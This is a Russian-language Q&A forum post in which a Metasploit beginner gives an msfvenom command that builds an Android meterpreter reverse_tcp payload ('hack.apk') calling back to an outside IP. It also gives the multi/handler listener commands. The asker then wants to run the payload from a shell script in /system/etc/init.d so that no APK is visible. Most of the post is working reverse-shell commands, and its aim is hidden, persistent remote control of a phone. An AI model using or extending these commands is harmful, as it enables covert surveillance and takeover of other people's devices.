PiCoderman
@PiCoderman

Android/meterpreter/reverse_tcp injection не в .apk а в shell(.sh). Возможно?

Я вот только-только познакомился с Metasploit и всеми этими делами, и у меня появилась идея. Короче есть такая штука :
rbenv sudo msfvenom -p android/meterpreter/reverse_tcp lhost=12.12.12.12 lport=756 > hack.apk

Затем устанавливаем на смартфоне и откуда нибудь слушаем :
rbenv sudo msfconsole
use multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 756
set ExitOnSession false
exploit -j

Тут все понятно. Запускаем приложение MainActivity на смартфоне, и у нас открывается сессия. MainActivity даже в автозагрузку попадает.
Но можно ли сделать тоже самое, но не через apk, а через shell. То есть засунуть какой-нибудь скрипт в /system/etc/init.d например?
Можно было бы через am start запускать это самое приложение, но хочется, чтобы вообще никаких apk не было
  • Вопрос задан
  • 1741 просмотр
Пригласить эксперта
Ответы на вопрос 1
@Pavkhv
электронщик, сисадмин, ТВ, радио, медиапродакшн
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Похожие вопросы